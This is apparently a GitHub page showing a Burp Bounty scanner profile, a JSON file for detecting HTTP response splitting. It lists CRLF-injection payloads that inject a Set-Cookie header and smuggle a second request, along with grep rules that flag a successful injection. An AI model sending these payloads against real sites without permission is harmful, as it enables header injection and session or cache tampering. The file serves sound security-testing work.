forked from SummerSec/BurpBountyProfiles
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathHTTP_Response_Splitting.bb
More file actions
1 lines (1 loc) · 1.17 KB
/
HTTP_Response_Splitting.bb
File metadata and controls
1 lines (1 loc) · 1.17 KB
1
[{"Name":"HTTP_Response_Splitting","Enabled":true,"Scanner":1,"Author":"@Xer0Days","Payloads":["INJECTX%0d%0aSet-Cookie:INJECTX123;%0d%0a","INJECTX%0aSet-Cookie:INJECTX123;%0a","INJECTX\\u{0120}HTTP/1.1\\u{010D}\\u{010A}Host:\\u{0120}crowdshield.com\\u{010D}\\u{010A}\\u{010D}\\u{010A}GET\\u{0120}/.injectx/r.php?http_split"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,Set-Cookie: INJECTX123","true,Or,Set-Cookie:INJECTX123"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"HTTP_Response_Splitting","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65,36,1,6,5,64,0,3,4],"Scantype":0,"pathDiscovery":false}]